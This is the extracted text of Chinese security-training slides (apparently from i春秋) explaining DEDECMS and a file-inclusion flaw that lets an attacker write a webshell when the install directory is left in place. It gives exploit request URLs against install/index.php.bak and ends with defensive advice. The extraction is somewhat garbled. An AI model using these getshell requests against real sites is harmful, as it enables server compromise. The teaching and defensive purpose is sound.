DEDECMS漏洞原理与防御措施详解.pdfVIP

DEDECMS原理与防御

讲师：i春秋

内容简介什么是DEDECMS

INTRODUCTION

DEDECMS都有哪些

利用DEDECMS直接GETSHELL

DEDECMS的防御措施

什么是DEDECMS

DEDECMS：

织梦内容管理系统(DedeCms)以简单、实用、开源而闻名，是国内最知名的PHP开

源管理系统，也是使用用户最多的PHP类CMS系统，在经历多年的发展，目前的版本

无论在功能，还是在易用性方面，都有了长足的发展和进步，DedeCms免费版的主要目标

用户锁定在个人站长，功能更专注于个人或中小型门户的构建，当然也不乏有企业用

户和学校等在使用本系统。

什么是DEDECMS

DEDECMS目录：

了解一下CMS的目录结构，可以

方便以后学习代码审计。

DEDECMS都有哪些

再SEEBUG查看：

DEDECMS都有哪些

文件包含：

DEDECMSv57sp1150820之前的版本，如果安装完程序后没有删除install目录，将

存在文件包含。

利用DEDECMS直接GETSHELL

利用方法：

/install/index.php.bak?step=11insLockfile=xs_lang=xinstall_demo_name

=../data/admin/config_update.php

重置/data/admin/config_update.php文件

利用DEDECMS直接GETSHELL

利用方法：

install/index.php.bak?step=11insLockfile=xs_lang=xinstall_demo_name=

../shell.phpupdateHost=

加载代码。

利用DEDECMS直接GETSHELL

利用方法：

需要设置的代码目录结构：

|www

|dedecms

||demodata.x.txt

|

DEDECMS的防御措施

防御：

在安装完成，一定要删除安装目录。

及时的了解DEDECMS的。

及时的更新的升级补丁包。

TheEnd

TheEnd